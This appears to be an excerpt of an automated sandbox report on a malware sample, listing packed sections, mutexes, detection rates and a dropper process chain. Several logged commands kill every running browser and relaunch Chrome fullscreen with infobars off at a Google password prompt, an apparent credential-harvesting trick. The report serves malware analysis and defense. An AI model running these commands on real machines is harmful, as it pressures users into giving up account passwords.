Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DA4DE0 5_2_00DA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DE31A8 5_2_00DE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DE2D10 5_2_00DE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DE779B 5_2_00DE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DA4B30 5_2_00DA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DD7F36 5_2_00DD7F36
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B28060 6_2_00B28060
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B92046 6_2_00B92046
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B88298 6_2_00B88298
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B5E4FF 6_2_00B5E4FF
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B5676B 6_2_00B5676B
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BB4873 6_2_00BB4873
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B4CAA0 6_2_00B4CAA0
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B2CAF0 6_2_00B2CAF0
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B3CC39 6_2_00B3CC39
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B56DD9 6_2_00B56DD9
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B291C0 6_2_00B291C0
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B3B119 6_2_00B3B119
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B41394 6_2_00B41394
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B41706 6_2_00B41706
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B4781B 6_2_00B4781B
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B419B0 6_2_00B419B0
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B27920 6_2_00B27920
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B3997D 6_2_00B3997D
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B47A4A 6_2_00B47A4A
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B47CA7 6_2_00B47CA7
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B41C77 6_2_00B41C77
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B59EEE 6_2_00B59EEE
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BABE44 6_2_00BABE44
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B41F32 6_2_00B41F32
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: String function: 00B40A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: String function: 00B3F9F2 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: String function: 00B845C0 appears 316 times
Uses 32bit PE files
Source: 8ObkdHP9Hq.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8ObkdHP9Hq.exe Static PE information: Section: ZLIB complexity 0.9982065309945504
Source: 8ObkdHP9Hq.exe Static PE information: Section: hicznzml ZLIB complexity 0.9947466036733454
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982065309945504
Source: skotes.exe.0.dr Static PE information: Section: hicznzml ZLIB complexity 0.9947466036733454
Source: random[1].exe0.5.dr Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: random[1].exe0.5.dr Static PE information: Section: kawjnymv ZLIB complexity 0.9945041232638889
Source: 9d7da53f74.exe.5.dr Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: 9d7da53f74.exe.5.dr Static PE information: Section: kawjnymv ZLIB complexity 0.9945041232638889
Source: num.exe, 00000014.00000002.2442234733.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 00000014.00000000.2430858736.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 0000002C.00000000.2616256029.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 0000002C.00000002.2631047820.0000000000B9E000.00000002.00000001.01000000.0000000C.sdmp, num[1].exe.5.dr, num.exe.5.dr Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@201/37@38/12
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B937B5 GetLastError,FormatMessageW, 6_2_00B937B5
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B810BF AdjustTokenPrivileges,CloseHandle, 6_2_00B810BF
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 6_2_00B816C3
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 6_2_00B951CD
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BAA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 6_2_00BAA67C
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 6_2_00B9648E
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 6_2_00B242A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 8ObkdHP9Hq.exe ReversingLabs: Detection: 52%
Source: 8ObkdHP9Hq.exe Virustotal: Detection: 56%
Source: 8ObkdHP9Hq.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 9d7da53f74.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 9d7da53f74.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File read: C:\Users\user\Desktop\8ObkdHP9Hq.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\8ObkdHP9Hq.exe "C:\Users\user\Desktop\8ObkdHP9Hq.exe"
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5648 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1152 --field-trial-handle=2040,i,8769351574913738686,7511269282204500585,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4484 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,7048868189645442855,15603037541109083957,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2904 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
